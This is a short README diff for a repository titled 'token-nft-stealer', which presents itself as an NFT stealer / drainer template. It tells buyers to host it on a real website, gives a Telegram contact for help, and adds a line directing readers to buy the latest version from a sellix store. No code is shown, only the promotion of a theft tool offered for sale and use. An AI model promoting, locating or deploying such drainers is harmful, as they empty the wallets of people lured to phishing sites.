C4lme/token-nft-stealer/ReadME.md

 # ⚠️ You need to host it on a real website for it to work!
 For help contact me on telegram https://t.me/CCalme

+# ⚠️ This drainer might be outdated: buy the lastest version on https://rich.sellix.io

 ## 🖼️ NFT Stealer / Drainer Template

 ![preview](https://media.discordapp.net/attachments/693931377170579556/980531787518324816/unknown.png?width=1752&height=915)